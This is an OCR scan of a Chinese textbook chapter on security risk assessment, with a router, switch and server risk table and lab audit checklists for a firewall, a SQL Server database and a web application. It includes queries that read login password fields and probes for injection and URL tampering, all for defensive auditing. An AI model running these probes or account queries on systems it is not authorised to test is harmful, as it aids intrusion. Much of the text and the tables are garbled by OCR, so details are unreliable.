风险 接受 等 级 划分 如 表 15-34 所 示 。 
表 15-34 风险 接受 等 级 划分 表 


资产 1D0 | 资产 名 称 "E" moms 风险 等 级 | 是 否 可 接受 
未 授权 访问 Cisco 未 设置 密码 2 E 
A-01 | 路 由 器 -1 漏洞 利用 ee iOS 界面 被 IPv4 数据 包 3 n 
EZ II] 没有 制定 访问 控制 策略 3 是 
A02 | 路 由 器 2 。 | 操作 失误 或 维护 铺 误 | 安装 与 维护 缺乏 管理 3 E 
Aos | 交换机 -1 | 漏洞 利用 日 志 及 管理 功能 未 启用 3 是 
CSCdz39284 3 是 
A-04 | 交换 机 -2 | 漏洞 利用 E : a 
CSCds04747 4 5 
A-05 交换 机 -3 漏洞 利用 没有 配备 Service Password En- 
4 E 
cryption 服务 
' MELAT] 1 A 
Aos [paa meaa E AE TH : B 
防火 墙 开放 端口 增加 3 是 
A-07 “| 防火 墙 -2 | 未 授权 访问 Ka Sa SSE : 区 
A8 | 防火墙 3 RAKHE 未 启用 日 志 功 能 1 A 
恶意 代码 或 病毒 ”| 操作 系统 补丁 未 安装 1 A 
硬件 故障 设备 不 稳定 3 是 
Aos | 病毒 服务 器 | 未 授权 访问 操作 系统 的 口令 策略 没有 启用 | 4 A 
木马 后 门 攻 击 操作 系统 开放 多 余 服务 3 是 
操作 失误 或 维护 错误 | 缺少 操作 规程 和 职责 管理 1 A 
未 授权 访问 FESIS E = 
Al | 数据 服务 器 | 恶意 代码 或 病毒 | 操作 系统 补 本 未 安 装 1 F: 
权限 滥用 没有 访问 控制 措施 1 * 
操作 失误 或 维护 错误 | 缺少 操作 规程 和 职责 管理 1 * 
未 授权 访问 FEROS 5 * 
A-11 | 应 用 服务 器 | 恶意 代码 或 病毒 | 操作 系统 补丁 未 安装 1 A 
Telnet 漏洞 4 否 
ARAM 可 以 通过 SMB 连接 注册 表 5 * 
恶意 代码 或 病毒 ”| 操作 系统 补丁 未 安装 1 = 
A-12 PC-1 用 NetBIOS 探测 Windows 3: 
Magd pP 4 E 
恶意 代码 或 病毒 ”| 木马 和 后 站 1 * 
A-13 | PC-2 数据 臭 改 SMB Shares Access 3 是 
au LEES E A 
A34 [UPS [IT 设备 不 稳定 1 * 
Ads | 空调 硬件 故障 设备 不 稳定 3 p 


【实验 目的 】 
(1) 掌握 防火 墙 安全 风险 检查 的 一 般 方法 。 
(2) 掌握 主机 安全 风险 检查 的 一 般 方法 。 


实践 


(3) 掌握 Web 服务 器 安全 风险 检查 的 一 般 方法 。 

【实验 内 容 】 

CD 参照 表 15-35 完成 对 你 所 在 部 门 (或 某 被 检查 部 门 ) 的 防火 墙 进行 安全 风险 检查 。 

(2) SRK 15-36 至 表 15-55 完成 对 所 在 部 门 ( 或 某 被 检查 部 门 ) 的 数据 库 服 务 器 进行 
(SQL Server) 安 全 风险 检查 。 

G) SRK 15-56 至 表 15-78 完成 对 你 所 在 部 门 (或 某 被 检查 部 门 ) 的 Web 服务 器 进行 
安全 风险 检查 。 

填写 完整 报告 ,编号 规则 : 设备 类 型 _ 客 户 名 称 _ 部 门 名 称 _ 数 字 编 号 。 

。 设备 类 型 SV 一 服务 器 ; PC 一 终端 ; FW 一 防火 墙 RO 一 路 由 器 ; SW 一 交换 机 。 

。 客户 名 称 : 拼音 缩写 。 

。 部 门 名 称 : 拼音 缩写 。 

。 数字 编号 使 用 3 位 数字 顺序 号 。 

R 15-35 防火 墙 安 全 风险 检查 表 
防火 墙 安全 审核 

被 审核 部 门 审核 人 员 审核 日 期 陪同 人 员 


序号 审核 项 目 审核 步骤 /方法 审核 结果 | 补充 说 明 | ”备注 

检查 防火 墙 安 全 策略 的 设置 是 否 合理 : 

COD 检查 防火 墙 是 否 只 开放 了 必须 要 开放 的 
端口 ; 

(2) 检查 防火 墙 是 否 禁止 了 所 有 不 必要 开放 
的 端口 ; 

(3) 检查 防火 墙 是 否 设 置 了 防 DOS 攻击 安全 
策略 ; 

(4) 检查 防火 墙 是 否 设置 了 抗 扫描 安全 措施 

防火 墙 应 | 防火墙 采用 何 种 应 用 模式 (透明 .NAT、 路 

2 用 模式 安 |H), 53 r EE NAT.PAT 措施 隐藏 

全 审核 ”| 服务 器 及 内 部 网 络 结构 

防火 墙 软 | 检查 防火 墙 操作 系统 是 否 为 最 新 版 本 ,是 否 

件 检查 安装 相应 的 安全 补丁 

COD 检查 防火 墙 的 通过 什么 方式 进行 管理 ,是 
否 为 安全 的 管理 方式 ; 

防火 墙 管 | (2) 检查 防火 墙 是 否 根 据 权 限 不 同 进行 分 级 

理 检 查 管理 ; 

(3) 检查 防火 墙 的 口令 设置 情况 ,口令 设置 是 
否 满足 安全 要 求 


O 检查 防火 墙 的 日 志 设置 是 否 合 理 , 是 否 有 
所 有 拒绝 数据 包 的 记录 日 志 ; 
CD 检查 防火 墙 的 日 志保 存 情况 ,所 记录 的 日 
5 cid 志 是 否 有 连续 性 
(3) 检查 防火 墙 日 志 的 查看 情况 ,网 络 安全 管 
理 员 是 否 按照 防火 墙 管理 制度 对 防火 墙 
进行 日 常 维护 


主机 信息 登记 参照 表 15-36 。 
表 15-36 主机 信息 表 


主机 信息 表 
设备 名 称 设备 编号 
设备 位 置 
正式 域名 /主机 名 
外 部 IP 地 址 内 部 全 地 址 
网 关 域名 服务 器 
操作 系统 版 本 号 
中 央 处 理 器 内 存 
外 部 存储 设备 
名 称 应 用 服务 及 版 本 情况 
其 他 信息 


安全 检查 一 般 包括 7 个 方面 ,获取 应 用 服务 信息 的 方法 参照 表 15-37 至 15-42, 并 把 相 
应 的 信息 补充 完整 。 


表 15-37 获取 版 本 号 与 启动 策略 


编号 : 名 称 : 获取 版 本 号 与 启动 策略 
说 明 : 

获取 SQL Server 的 版 本 号 与 启动 策略 

检查 方法 : 


开始 一 程序 一 Microsoft SQL Server~ 企 业 管理 器 一 控制 台 目录 一 Microsoft SQL Servers-* SQL Server 
组 ,在 要 查看 的 服务 器 上 右 击 选择 “属性 ”一 “常规 "命令 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


备注 : 
8.0 就 是 SQL Server 2000 


实践 


表 15-38 ”获取 服务 运行 权限 


编号 : 名 称 : 获取 服务 运行 权限 


LU 


获取 SQL Server 服务 使 用 用 户 权限 


检查 方法 : 


JF 35 4T— Services. msc MS SQL Server 习 属性 一 登录 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


无 


检查 结果 : 


适用 版 本 : 


全 部 


fik: 


R 15-39 获取 服务 监听 端口 和 地 址 


编号 : 名 称 : 获取 服务 监听 端口 和 地 址 


说 明 ， 


获取 SQL Server 所 监听 端口 和 地 址 


检查 方法 : 


开始 一 程序 Microsoft SQL Server 习 企业 管理 器 一 控制 台 目录 一 Microsoft SQL Servers SQL Server 
组 ,在 要 查看 的 服务 器 上 右 击 选择 “属性 ”>“ 常 规 ”>“ 网 络 配置 "命令 ,选中 “启用 协议 ”列表 框 中 的 相关 
协议 ,查看 “属性 ” 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


无 


检查 结果 : 


表 15-40 ”获取 与 SQL Server 相关 的 应 用 


编号 : 名 称 : 获取 与 SQL Server 相关 应 用 


LU 


获取 与 SQL Server 相关 联 服务 信息 


检查 方法 : 


询问 管理 员 网 络 中 需要 使 用 此 SQL Server 的 应 用 名 称 ,数据 重要 程度 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


无 


检查 结果 : 


适用 版 本 : 


全 部 


ik: 


表 15-41 获取 数据 库 维 护 人 员 信息 


编号 : 名 称 : 


获取 数据 库 维护 人 员 信 息 


说 明 ， 


获取 与 SQL Server 所 有 数据 库 维护 人 员 以 及 主机 维护 人 员 和 名单 


检查 方法 : 


询问 相关 人 员 : 
每 个 数据 库 的 管理 员 是 谁 ? 
系统 管理 员 是 谁 ? 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


无 


检查 结果 : 


适用 版 本 : 


全 部 


备注 : 


表 15-42 备份 方式 


编号 : 名 称 : 


获取 数据 库 备 份 方式 


说 明 : 


获取 与 SQL Server 数据 库 备份 方式 


检查 方法 : 


询问 相关 人 员 : 
谁 在 什么 时 候 用 什么 方法 把 哪些 数据 备份 到 什么 地 方 ? 
谁 在 什么 情况 下 决定 用 什么 方法 把 哪些 地 方 如 何 恢复 ? 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


实践 


补丁 安装 情况 参考 表 15-43 ,并 把 相应 信息 补充 完整 。 
表 15-43 补丁 安装 情况 


编号 : 名 称 : 获取 补丁 安装 情况 
LUD 

获取 系统 中 安装 了 哪些 SQL Server 补丁 ,缺少 了 哪些 SQL Server 补丁 

检查 方法 : 


HFNetChk 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


无 


检查 结果 : 


适用 版 本 : 


全 部 


备注 : 


安装 工具 HFNetChk 需要 1MB 硬盘 空间 ; 
使 用 工具 HFNetChk 需要 网 络 连接 和 额外 的 5MB 硬盘 空间 
下 载 补丁 信息 文件 需要 的 时 间 依 网 络 速度 而 定 


账号 和 口令 检查 方法 参照 表 15-44 ER 15-46 ,并 把 相应 信息 补充 完整 。 


表 15-44 账号 检查 
编号 : 名 称 : 获取 SQL Server 系统 中 账号 
说 明 
获取 当前 SQL Server 系统 中 所 有 用 户 信息 
检查 方法 : 


F th F> Microsoft SQL Server SQL 查询 分 析 器 ,登录 后 在 查询 中 输入 如 下 代码 。 
use master 

Select name, password 

from syslogins 

order by name 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


无 


检查 结果 : 


适用 版 本 : 


全 部 


备注 ， 


表 15-45 无 密码 用 户 列表 


编号 : 名 称 : 获取 无 密码 用 户 列表 


说 明 ， 


获取 当前 SQL Server 系统 中 所 有 无 密码 用 户 


检查 方法 : 


开始 一 程序 Microsoft SQL Server SQL 查询 分 析 器 ,登录 后 在 查询 中 输入 如 下 代码 。 
Use master 

Select name, password 

from syslogins 

where password is null 

order by name 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


检查 结果 : 


适用 版 本 : 


全 部 


备注 : 


表 15-46 用 户 访问 许可 


编号 : 名 称 : 用 户 访 问 许可 


说 明 : 


获取 用 户 访问 许可 


检查 方法 : 


开始 一 程序 Microsoft SQL Server~~ 企 业 管理 器 一 控制 台 目录 一 Microsoft SQL Servers-* SQL Server 
组 ,选择 要 查看 的 服务 器 中 的 “用 户 ” 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


无 


检查 结果 : 


适用 版 本 : 


全 部 


备注 : 


实践 


服务 安全 检查 方法 参照 表 15-47 ,并 把 相应 信息 补充 完整 。 
表 15-47 通信 协议 表 


编号 : 名 称 : 使 用 的 通信 协议 
LU 

检查 SQL Server 是 否 使 用 了 除 TCP/IP 以 外 的 通信 协议 

检查 方法 : 


F th — f FE — Microsoft SQL Server-> 企 业 管理 器 -~ 控制 台 目 录 ~> Microsoft SQL Servers SQL Server 
组 ,在 要 查看 的 服务 器 上 右 击 选择 “属性 ”>“ 常 规 ”>“ 网 络 配置 "命令 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


无 


检查 结果 : 


适用 版 本 : 


全 部 


fik: 


文件 系统 安全 检查 方法 参照 表 15-48 至 表 15-50, 并 把 相应 信息 补充 完整 。 
表 15-48 操作 系统 文件 类 型 表 


编号 : 名 称 : 获取 操作 系统 文件 类 型 
说 明 : 

查看 SQL Server 程序 和 数据 文件 所 在 分 区 文件 系统 格式 

检查 方法 : 

查看 磁盘 分 区 属性 : 


在 “我 的 电脑 ”窗口 中 选中 要 查看 的 分 区 ,然后 按 Alt 十 Enter fil 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


无 


检查 结果 : 


适用 版 本 : 


全 部 


fik. 


如 果 数 据 文件 和 程序 文件 分 布 在 多 个 分 区 ,请 查看 多 次 


R 15-49 权限 


编号 : 名 称 : 获取 操作 系统 文件 权限 
LU 

查看 SQL Server 程序 和 数据 文件 所 在 分 区 文件 系统 权限 分 配 

检查 方法 : 

查看 文件 系统 权限 分 配 : 


在 控制 台中 切换 到 SQL Server 程序 文件 所 在 目录 ,输入 命令 cacls *. * /t>bin. txt; 
在 控制 台中 切换 到 SQL Server 数据 文件 所 在 目录 ,输入 命令 cacls * . * /t>data. txt 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


无 


检查 结果 : 


适用 版 本 : 


全 部 


备注 : 


注意 保存 生成 的 两 个 文件 bin. txt 和 data, txt 


表 15-50 备份 数据 访问 权限 


编号 : 名 称 : 获取 备份 数据 访问 权限 


WH: 


调查 数据 库 备份 访 问 权限 


检查 方法 : 


询问 管理 员 ， 
数据 库 备 份 存放 在 什么 位 置 ? 是 否 有 防护 措施 (例如 : 铁 门 、 锁 )? 谁 可 以 绕 过 这 些 防 护 措施 (例如 : 3 
是 所 有 者 ) 访 问 数据 库 备 份 ? 数据 库 备 份 如 何 销毁 ? 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


实践 


日 志 审 核 检 查 方法 参照 表 15-51 MÆ 15-52 ,并 把 相应 信息 补充 完整 。 
表 15-51 日 志 设置 


编号 : 名 称 : 登录 失败 和 对 象 访问 失败 的 日 志 设 置 
LUE 

获取 SQL Server 登录 和 对 象 访问 失败 的 设置 

检查 方法 : 


F tf fL FF— Microsoft SQL Server->~ 企 业 管 理 器 一 控制 台 目 录 一 Microsoft SQL Servers 一 SQL Server 
组 ,在 要 查看 的 服务 器 上 右 击 选择 “属性 一 安全 性 ”命令 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


无 


检查 结果 : 


适用 版 本 : 


全 部 


备注 : 


表 15-52 检查 情况 


编号 : 名 称 : 日 志 检查 情况 


说 明 : 


获取 SQL Server 日 志 检 查 情况 设置 


检查 方法 : 


询问 管理 员 查 看 日 志 的 周期 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


安全 增强 性 检查 方法 参照 表 15-53 至 表 15-55 ,并 把 相应 信息 补充 完整 。 
表 15-53 ”存储 过 程 列表 


编号 : 名 称 : 获取 存储 过 程 列表 


LU 


获取 SQL Server 当前 存储 过 程 


检查 方法 : 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


无 


检查 结果 : 


适用 版 本 : 


全 部 


备注 : 


表 15-54 注册 表 访 问 权限 


编号 : 名 称 : 获取 注册 表 访 问 权限 


LU 


获取 注册 表 下 列 相 关 权 限 设置 ,命令 为 HKEY CURRENT _ USER SOFTWARE Microsoft V 
MSSQLServer\ 


检查 方法 : 


查看 该 注册 表 项 的 访问 列表 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


检查 结果 : 


适用 版 本 : 


全 部 


备注 : 


实践 


表 15-55 ”存储 和 扩展 权限 


编号 : 名 称 : 


存储 过 程 和 扩展 存储 过 程 访问 权限 


说 明 ， 


开始 一 程序 一 Microsoft SQL Server~ 企 业 管理 器 一 控制 台 目 录 一 Microsoft SQL Servers 一 SQL Server 
组 ,选择 要 查看 的 服务 器 ,选择 “存储 过 程 " 和 “扩展 存储 过 程 ”, 右 击 选择 “导出 列表 ”命令 


检查 方法 : 


查看 该 注册 表 项 的 访问 列表 


检查 风险 (对 系统 的 影响 ,请 具体 描述 ) : 


检查 结果 : 


适用 版 本 : 


全 部 


fik: 


注意 保存 导出 的 两 个 列表 文件 


Web 服务 器 安全 风险 性 测试 实例 


(1) Web 系统 安全 性 检查 方法 参照 表 15-56 至 表 15-73 ,并 把 相应 信息 补充 完整 。 


表 15-56 客户 端 验 证 和 服务 器 端 验证 


说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results, 得 出 测试 结论 


Test Case001: 客户 端 验 证 ,服务 器 端 验证 (禁用 脚本 调试 ,禁用 Cookies) 


Summary: 检验 系统 权限 设置 的 有 效 性 


Steps: 

O 输入 很 大 的 数 (如 4,294,967,269) ,输入 很 小 的 数 (负数 ) 。 

@ 输入 超 长 字符 ,如 对 输入 文字 长 度 有 限制 , 则 尝试 超过 限制 ,刚好 到 达 限 
制 字数 时 有 何 反应 。 

@ 输入 特殊 字符 ,如 一 ! @# $A OLP 

© 输入 中 英文 空格 ,输入 字符 串 中 间 含 空格 ,输入 首尾 空格 。 

© 输入 特殊 字符 串 NULL,null,0x0d 0x0a。 

© 输入 正常 字符 串 。 

CD 输入 与 要 求 不 同类 型 的 字符 ,如 要 求 输入 数字 则 检查 正 值 . 负 值 . 零 值 
( 正 零 , 负 零 ) 小数. 字母. 空 值 ; 要 求 输 入 字母 则 检查 输入 数字 。 

(& 输入 HTML #l JavaScript 代码 。 

@ 对 于 某 些 需 登 录 后 或 特殊 用 户 才能 进入 的 页 面 ,检查 是 否 可 以 通过 直接 
输入 网 址 的 方式 进入 。 

四 对 于 带 参数 的 网 址 ,恶意 修改 其 参数 ( 若 为 数字 , 则 输入 字母 ,或 很 大 的 
数字 ,或 输入 特殊 字符 等 ) 后 打开 网 址 检查 是 否 出 错 ,是 否 可 以 非法 进入 
某 些 页 面 


Expected Results: 
CD 输入 的 验证 码 错误 。 
© 输入 的 验证 码 过 长 。 
@ 输入 的 验证 码 错误 。 
@ 输入 的 验证 码 错误 。 
© 输入 的 验证 码 错误 。 
@ 输入 的 验证 码 正确 ,成 
功 登 录 系 统 。 
@ 输入 的 验证 码 错误 。 
( 输入 的 验证 码 错误 。 
加 系统 权限 设置 是 有 
效 的 


场景 法 


Pass/Fail; 


Test Notes: 


Author: 


515-57. 关于 URL 


说 明 , 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case002: 关于 URL 


Summary; 检验 系统 防范 非法 入侵 的 能 力 


Steps: 

CD 对 于 某 些 需 登录 后 或 特殊 用 户 才能 进入 的 页 面 ， 
查看 是 否 可 以 通过 直接 输入 网 址 的 方式 进入 。 

@ 对 于 带 参数 的 网 址 ,恶意 修改 其 参数 ( 若 为 数字 ， 
则 输入 字母 ,或 很 大 的 数字 ,或 输入 特殊 字符 等 ) 
后 打开 网 址 查看 是 否 出 错 ,是 否 可 以 非法 进入 


页 面 。 
@ 搜索 页 面 等 URL 中 含有 关键 字 的 ,输入 HTML 
代码 或 JavaScript, 看 是 否 在 页 面 中 显示 或 执行 。 
@ 输入 善意 字符 。 


Expected Results: 

不 可 以 直接 通过 直接 输入 网 址 的 方式 进入 。 

@ 对 于 带 参数 的 网 址 ,恶意 修改 其 参数 ( 若 为 数 
字 , 则 输入 字母 ,或 很 大 的 数字 ,或 输入 特殊 字 
符 等 ) 后 打开 网 址 出 错 , 不 可 以 非法 进入 页 面 。 

@ 输入 HTML 代码 或 JavaScript 后 不 会 在 页 面 
中 显示 或 执行 。 

@ 正常 进入 页 面 


场景 法 


Pass/Fail: 


Test Notes: 


Author: 


表 15-58 日 志 记录 的 完整 性 
WH: 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case003; 日 志 记录 的 完整 性 


Summary: 检验 系统 运行 的 时 候 是 否 会 记录 完整 的 日 志 


Steps: 


Expected Results: 


(D 进行 详 单 查询 ,检测 系统 是 否 会 记录 相应 的 操作 员 。 

@ 进行 详 单 查询 ,检测 系统 是 否 会 记录 相应 的 操作 时 间 。 
@ 进行 详 单 查询 ,检测 系统 是 否 会 记录 相应 的 系统 的 状态 。 
D 进行 详 单 查询 ,检测 系统 是 否 会 记录 相应 的 操作 事项 。 
C) 进行 详 单 查询 ,检测 系统 是 否 会 记录 相应 的 TP 地 址 等 


(D 系统 会 记录 相应 的 操作 员 。 

© 系统 会 记录 相应 的 操作 时 间 。 
@ 系统 会 记录 相应 的 系统 的 状态 。 
@ 系统 会 记录 相应 的 操作 事项 。 
© 系统 会 记录 相应 的 TP 地 址 


场景 法 


Pass/Fail: 


Test Notes: 


Author: 


表 15-59 软件 安全 性 测试 涉及 的 方面 
WHH: 执行 每 一 步 STEPS 时 ,请 参照 对 应 编号 的 EXPECTED RESULTS 得 出 测试 结论 


Test Case004: 软件 安全 性 测试 涉及 的 方面 


Summary: 检验 系统 的 数据 备份 


Steps: 

(D 检查 是 否 设置 密码 最 小 长 度 。 

O 检查 用 户 名 和 密码 是 否 可 以 有 空格 和 回 车 ? 
O 检查 是 否 允 许 密码 和 用 户 名 一 致 


四 检查 防 恶意 注册 ,看 是 否 可 含 用 自动 填 表 工具 自动 注册 用 户 ? 


C) 检查 遗忘 密码 处 理 。 

@ 检查 有 无 默认 的 超级 用 户 ? 
O 检查 有 无 超级 密码 ? 

@ 检查 密码 错误 有 无 限制 ? 


O 检查 密码 复杂 性 (如 规定 字符 应 混 有 大 、 小 写字 母 ,数字 和 特殊 字符 ) | @ 


EXPECTED RESULTS; 


[E 
Q 不 可 以 。 


场景 法 


Pass/Fail: 


Test Notes: 


Author; 


实践 


表 15-60 没有 被 验证 的 输入 


说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case005: 没有 被 验证 的 输入 


Summary: 检验 输入 验证 


Steps: 

CD 数据 类 型 (字符 串 、 整 型 .实数 等 ) 。 
Q 允许 的 字符 集 。 

@ 最 小 和 最 大 的 长 度 。 

D 是 否 允 许 空 输入 。 

O 参数 是 否 是 必需 的 。 

@ 重复 是 否 允许 。 

C 数值 范围 。 

© 特定 的 值 ( 枚 举 型 )。 

O 特定 的 模式 (正则 表达 式 ) 


Expected Results; 
对 上 述 输入 有 控制 


场景 法 


Pass/Fail; 


Test Notes; 


Author: 


表 15-61 访问 控制 
说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case006 ; 访问 控制 


Summary; 检验 访问 控制 


Steps: 


用 于 需要 验证 用 户 身 份 以 及 权限 的 页 面 ,复制 该 页 面 的 URL 地 址 ,关闭 
该 页 面 以 后 ,查看 是 否 可 以 直接 进入 该 复制 好 的 地 址 。 
例 : 从 一 个 页 面 链 到 另 一 个 页 面 的 间隙 可 以 看 到 URL 地 址 ,直接 输入 该 


地 址 ,可 以 看 到 自己 没有 权限 的 页 面 信息 


Expected Results: 
不 能 进入 


场景 法 


Pass/Fail: 


Test Notes: 


Author: 


表 15-62 输入 框 验证 


说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case007 ; 输入 框 验证 


Summary: 验证 输入 框 是 否 经 验证 


Steps: 
对 Grid, Label, Tree View 类 的 输入 框 未 作 验 证 ， 
输入 的 内 容 会 按照 HTML 语法 解析 出 来 


Expected Results: 
对 上 述 输入 有 控制 


场景 法 


Pass/Fail: 


Test Notes: 


Author: 


表 15-63 关键 数据 加 密 


说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case008: 关键 数据 加 密 


Summary: 是 否 对 关键 数据 进行 加 密 


Steps: 

登录 界面 密码 输入 框 中 输入 密码 ,页 面 显示 的 是 xx xxx , 右 击 ,选择 全 Bii Results 
令 查看 源 文 件 是 否 可 以 看 见 刚 才 输入 的 密码 

场景 法 

Pass/Fail: Test Notes: 
Author: 


R 15-64 认证 请 求 方式 
说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case009 ; 认证 请 求 方式 


Summary: 检验 认证 请 求 方式 


Steps: Expected Results; 
认证 和 会 话 数据 是 否 使 用 POST 方式 ,而 非 GET 方式 “| 采用 POST 方式 
场景 法 

Pass/Fail: Test Notes: 
Author: 


表 15-65 SQL 注入 
说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case010: SQL 注入 


Summary: 检验 是 否 存在 SQL 注入 


Steps: Expected Results: 
无 效 

场景 法 

Pass/Fail: Test Notes: 

Author: 


R 15-66 文件 上 传 风险 


说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case011: 文件 上 传 风险 


Summary: 
Expected Results: 
Steps: 无 效 
场景 法 
Pass/Fail: Test Notes: 


Author: 


实践 


表 15-67 ”功能 失效 .异常 带 来 的 安全 风险 


说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case012: 功能 失效 .异常 带 来 的 安全 风险 


Summary: 

Steps: Expected Results; 
无 效 

场景 法 

Pass/Fail: Test Notes: 

Author; 


R 15-68 操作 日 志 检 查 
说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case013; 操作 日 志 检查 


Summary: 

5 Expected Results: 
XX 

场景 法 

Pass/Fail; Test Notes; 

Author: 


R 15-69 登录 次 数 限制 
说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case014: 登录 次 数 限制 


Summary: 

Steps: Expected Results: 
无 效 

场景 法 

Pass/Fail; Test Notes; 

Author: 


515-70 IE 回 退 按钮 


说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case015: IE 回 退 按钮 


Summary: 


Steps: Expected Results; 
退出 系统 后 , 单 击 IE 回 退 按钮 ,查看 能 否 重新 回 到 系统 中 | 无 效 


场景 法 


Pass/Fail: Test Notes: 


Author: 


表 15-71 通信 保密 性 (一 ) 


说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case016 ; 通信 保密 性 


Summary: 


Steps: 

O 测试 主要 应 用 系统 ,查看 当 通 信 双 方 中 的 一 方 在 一 段 时 间 内 未 作 任 何 
响应 , 另 一 方 是 否 能 自动 结束 会 话 ; 系统 是 否 能 在 通信 双方 建立 会 话 
之 前 ,利用 密码 技术 进行 会 话 初 始 化 验证 (如 SSL 建立 加 密 通道 前 是 
否 利用 密码 技术 进行 会 话 初始 验证 ); 在 通信 过 程 中 ,是 否 对 整个 报 


文 或 会 话 过 程 进行 加 密 。 Expected Results: 


© 测试 主要 应 用 系统 ,通过 通信 双方 中 的 一 方 在 一 段 时 间 内 未 作 任 何 响 
应 ,查看 另 一 方 是 否 能 自动 结束 会 话 ; 测试 当 通信 双方 中 的 一 方 在 一 
段 时间 内 未 作 任 何 响应 , 另 一 方 是 否 能 自动 结束 会 话 的 功能 是 否 
有 效 。 

@ 测试 主要 应 用 系统 ,通过 查看 通信 双方 数据 包 的 内 容 , 查 看 系统 在 通 
信 过 程 中 ,对 整个 报 文 或 会 话 过 程 进 行 加 密 的 功能 是 否 有 效 


场景 法 


Pass/Fail: Test Notes: 


Author: 


表 15-72 通信 保密 性 (二 ) 
说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case017 ; 通信 保密 性 


Summary: 


Steps: 

CD 应 限制 单个 用 户 的 多 重 并 发 会 话 。 

@ 应 对 应 用 系统 的 最 大 并 发 会 话 连接 数 进行 限制 。 

© 应 对 一 个 时 间 段 内 可 能 的 并 发 会 话 连接 数 进 行 限制 。 

CD 应 根据 安全 策略 设置 登录 终端 的 操作 超时 锁定 和 鉴别 失败 锁定 ,并 规定 解锁 或 
终止 方式 。 

C 应 禁止 同一 用 户 账号 在 同一 时 间 内 并 发 登录 。 

© 应 对 一 个 访问 用 户 或 一 个 请 求 进程 占用 的 资源 分 配 最 大 限额 和 最 小 限额 。 

@ 应 根据 安全 属性 (用 户 身 份 .访问 地 址 、 时 间 范 围 等 ) 允 许 或 拒绝 用 户 建立 会 话 
连接 。 

@ 当 系 统 的 服务 水 平 降低 到 预先 规定 的 最 小 值 时 ,应 能 检测 和 报警 。 

@ 应 根据 安全 策略 设 定 主体 的 服务 优先 级 ,根据 优先 级 分 配 系统 资源 ,保证 优先 
级 低 的 主体 处 理 能 力 不 会 影响 到 优先 级 高 的 主体 的 处 理 能 力 


Expected Results; 


场景 法 


Pass/Fail: 


Test Notes: 


Author: 


实践 


表 15-73 数据 备份 和 恢复 


说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case018: 数据 备份 和 恢复 


Summary: 


Steps: 

CD 应 提供 自动 备份 机 制 对 重要 信息 进行 本 地 和 异地 备份 。 
@ 应 提供 恢复 重要 信息 的 功能 。 Expected Results: 
@ 应 提供 重要 网 络 设备 、 通 信 线 路 和 服务 器 的 硬件 元 余 。 
@ 应 提供 重要 业务 系统 的 本 地 系统 级 热 备份 


场景 法 


Pass/Fail: Test Notes: 


Author: 


(2) 服务 器 安全 性 检查 方法 参照 表 15-74 ER 15-78, 并 把 相应 信息 补充 完整 。 
表 15-74 ”操作 系统 账户 
说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case001: 


Summary: 操作 系统 账户 


Expected Results; 
Steps: 无 效 
场景 法 
Pass/Fail; Test Notes; 
Author: 


R 15-75 文件 分 区 格式 
说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case002: 文件 分 区 格式 


Summary: 

Steps: Expected Results; 
无 效 

场景 法 

Pass/Fail; Test Notes; 

Author: 


R 15-76 中 间 件 密码 


说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case003: 中 间 件 密码 


Summary: 

ep Expected Results: 
无 效 

场景 法 

Pass/Fail: Test Notes: 


Author: 


表 15-77 数据库 用 户 密码 


说 明 : 执行 每 一 步 Steps 时 ,请 参照 对 应 编号 的 Expected Results 得 出 测试 结论 


Test Case004: 数据 库 用 户 密码 


Summary: 


Steps: 
